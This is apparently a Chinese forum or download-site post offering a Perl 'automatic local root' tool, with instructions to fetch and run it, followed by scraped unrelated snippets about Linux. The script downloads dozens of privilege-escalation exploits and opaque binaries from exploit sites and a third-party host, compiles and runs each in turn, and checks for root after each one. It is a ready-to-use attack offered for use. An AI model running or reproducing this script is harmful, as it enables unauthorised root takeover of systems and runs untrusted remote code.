代码保存为 xx.txt
cd /tmp //进入tmp目录
wget http://localhost/xx.txt //下载脚本
perl xx.txt //执行溢出脚本
完全傻瓜化,不过不智能。
下面是代码
#!/usr/bin/perl
# 本地自动溢出获取root权限工具
# 如果大牛们的精力多搜集多了,也给我一份小弟
# mail:0x14ob@gmail.com QQ交流群:67594719(纯技术特区,装X没实力的别来)
{
system("wget http://www.exploit-db.com/download/15944;mv 15944 15944.c");
system("gcc -w 15944.c -o 15944");
system("sudo setcap cap_sys_admin+ep 15944");
system("chmod 777 15944");
system("./15944");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/iskorpitx");
system("chmod 777 iskorpitx");
system("./iskorpitx");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/run2");
system("chmod 777 run2");
system("./run2");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/2009-proto_ops.tgz");
system("tar zxf 2009-proto_ops.tgz");
system("chmod 777 run.sh");
system("./run.sh");
system("./chmod 777 exploit");
system("./chmod 777 run");
system("./exploit");
system("./run");
system("id");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15200");
system("chmod 777 15200");
system("./15200");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15201");
system("chmod 777 15201");
system("./15201");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15285.c");
system("gcc 15285.c -o 15285");
system("chmod 777 15285");
system("./15285");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15");
system("chmod 777 15");
system("./15");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/27");
system("chmod 777 27");
system("./27");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/27-1");
system("chmod 777 27-1");
system("./27-1");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/28");
system("chmod 777 28");
system("./28");
system("id");
system("http://plasteryapidekorasyon.com/yavuz/tool/15150");
system("chmod 777 15150");
system("./15150 0xc0102290 64");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/siy1");
system("chmod 777 siy1");
system("./siy1");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/siy");
system("chmod 777 siy");
system("./siy");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_kdesud.c");
system("gcc hoagie_kdesud.c -o hoagie_kdesud");
system("chmod 777 hoagie_kdesud");
system("./hoagie_kdesud");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_restore.c");
system("gcc hoagie_restore.c -o hoagie_restore");
system("chmod 777 hoagie_restore");
system("./hoagie_restore");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_ntping.c");
system("gcc hoagie_ntping.c -o hoagie_ntping");
system("chmod 777 hoagie_ntping");
system("./hoagie_ntping");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_exim.c");
system("gcc hoagie_exim.c -o hoagie_exim");
system("chmod 777 hoagie_exim");
system("./hoagie_exim");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_solarisldap.c");
system("gcc hoagie_solarisldap.c -o hoagie_solarisldap");
system("chmod 777 hoagie_solarisldap");
system("./hoagie_solarisldap");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_solaris_siocgtunparam.c");
system("gcc hoagie_solaris_siocgtunparam.c -o hoagie_solaris_siocgtunparam");
system("chmod 777 hoagie_solaris_siocgtunparam");
system("./hoagie_solaris_siocgtunparam");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_udp_sendmsg.c");
system("gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg");
system("chmod 777 hoagie_udp_sendmsg");
system("./hoagie_udp_sendmsg");
system("id");
}
分享到:
相关推荐
或者结合`sudo`命令获取root权限,查看受保护的端口信息。 在进行这些操作时,需要注意权限问题,有些系统敏感端口(如1024以下的端口)需要root权限才能查看。同时,了解`/proc`目录下的信息也很重要,比如`/proc/...
获取ROOT权限的方法因设备和Android版本的不同而异,通常涉及刷入第三方Recovery、使用专门的ROOT工具(如Magisk、SuperSU等)或执行特定的命令。但是,这通常需要一定的技术知识,且存在风险,因此建议新手在充分...
本文将详细介绍如何在 Linux 系统下自动备份远程服务端的 MySQL 数据库到本地,包括使用 crontab 设置定时任务、mysqldump 工具导出数据库、mysql 命令导入数据库等操作。 作为一名 IT 从业者,在生产环境中备份...
在IT安全领域中,系统提权(Privilege Escalation)是指攻击者通过利用操作系统中的漏洞或配置错误,将自身的权限提升到更高的级别,如Linux下的root权限或Windows下的Administrator权限。这通常涉及到一系列的技术...
利用此漏洞,攻击者可以获取root权限。这个过程包括使用工具如linux-exploit-suggester来识别系统中的可利用漏洞,下载EXP,将其上传到系统,编译并执行。例如,`nmap`用于扫描网络,`search drupal`查找Drupal CMS...
Linux 内网渗透是指在获取了 Linux 系统权限后,进一步渗透和攻击内网的技术。本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux ...
在使用该模块之前,用户应当确保自己的设备已经获取root权限,并且已经安装了Magisk框架。此外,用户需要了解自动化清理可能会涉及到的隐私和数据安全问题。例如,某些缓存文件可能包含个人信息,清理时需注意不要...
运行这个批处理文件后,设备会"自动root和安装busybox",Busybox是一个包含许多Linux实用工具的小型软件集合,对于Root后的设备非常有用,因为它提供了很多基本的命令行功能。"要等待几分钟"提示用户Root过程可能...
在虚拟机Linux系统中安装SYNOPSYS工具是一项关键任务,尤其对于电子设计自动化(EDA)领域的工程师来说。本教程详细介绍了在VTRON虚拟机中使用Fedora 10操作系统安装SYNOPSYS工具的过程。以下是一步步的详解: 首先...
通过本地软件库进行安装是一种简单有效的方法,尤其是对于那些希望使用其特定Linux发行版的标准包管理工具的用户。 #### 安装前准备 在开始安装之前,确保满足以下条件: 1. **操作系统**:确保您的Linux系统已更新...
### Linux系统资源监控工具nmon的使用详解 #### 一、概述 nmon是一款轻量级的系统资源监控工具,由IBM开发并免费提供给用户使用。它主要用于Linux和AIX系统的性能测试与分析,可以帮助用户实时监控系统资源的使用...
4. **权限管理**:由于lshw可能涉及敏感的系统信息,所以一般需要以root权限运行。 通过lshw-B.02.18,Linux用户不仅可以了解到系统硬件的详细状况,还能在硬件升级、问题排查时找到准确的参考信息。这个工具对于...
**SecureCRT:Linux服务器连接工具详解** SecureCRT是一款强大的终端模拟器软件,尤其在IT行业中,它被广泛用于远程连接Linux服务器,进行命令行操作。作为一个免安装的解决方案,SecureCRT提供了一种便捷的方式,...
在Linux中,"finger"命令是一个历史悠久的工具,用于获取远程或本地用户的信息,包括用户名、登录名、终端类型、上次登录时间、主目录以及用户简介(如果有的话)。在Linux 6.0环境下,我们有时需要安装这个命令来...
【Linux_Win 模拟器】是一款专为在Windows环境下学习Linux设计的工具,它使得用户无需实际的虚拟机即可体验和操作Linux系统。这款模拟器对于初学者来说尤其便利,因为它提供了在Windows操作系统中无缝运行Linux...
Linux操作系统是许多IT专业人士在日常工作中经常使用的工具,尤其在服务器管理和软件开发中扮演着重要角色。本篇文章将深入探讨Linux操作日志、虚拟机与镜像、发布项目等相关知识点。 1. **基础操作** - **登录**...
在Linux系统中,非root用户通常不具备全局权限,这使得在系统级安装软件变得复杂,尤其是像MySQL这样的数据库服务。然而,通过使用Cmake构建工具,可以实现非root用户安装MySQL 5.6.40版本。以下是详细的步骤和相关...
- 动态网络配置则可以通过 DHCP 客户端自动获取。 #### 三、Linux 服务篇 **3.1 Linux 服务部署** - **3.1.1 构建 NTP 时间服务器** - NTP (Network Time Protocol) 用于同步网络中的计算机时钟。 - 配置过程...
在Linux环境下,MySQL的管理和维护还有很多高级话题,如配置文件的修改、权限管理、日志监控等,这些都是进阶使用者需要掌握的。希望这篇指南能帮助你快速入门Linux下的MySQL安装,让你在数据库管理的道路上更进一步...
2. **下载Linux版MySQL安装包**:访问MySQL官方下载页面(https://downloads.mysql.com/archives/community/)获取MySQL 8.0.26版本的Linux安装包。 #### 二、上传MySQL安装包至服务器 完成下载后,可以通过FTP或...